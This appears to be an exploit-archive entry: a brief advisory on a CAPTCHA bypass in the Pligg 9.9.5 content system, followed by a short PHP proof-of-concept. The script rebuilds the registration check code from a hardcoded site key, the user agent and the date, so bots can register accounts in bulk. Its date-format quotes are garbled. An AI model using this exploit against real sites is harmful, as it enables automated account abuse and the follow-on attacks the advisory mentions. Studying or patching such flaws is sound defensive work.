21 lines
No EOL
563 B
PHP
Executable file
21 lines
No EOL
563 B
PHP
Executable file
source: http://www.securityfocus.com/bid/30518/info
|
|
|
|
Pligg is prone to a security-bypass weakness.
|
|
|
|
Successfully exploiting this issue will allow an attacker to register multiple new users through an automated process. This may lead to other attacks.
|
|
|
|
Pligg 9.9.5 is vulnerable; other versions may also be affected.
|
|
|
|
<?php
|
|
|
|
$sitekey=82397834;
|
|
|
|
$ts_random=$_REQUEST['ts_random'];
|
|
|
|
$datekey = date(?F j?);
|
|
|
|
$rcode = hexdec(md5($_SERVER['HTTP_USER_AGENT'] . $sitekey . $ts_random . $datekey));
|
|
|
|
print substr($rcode, 2, 6);
|
|
|
|
?>
|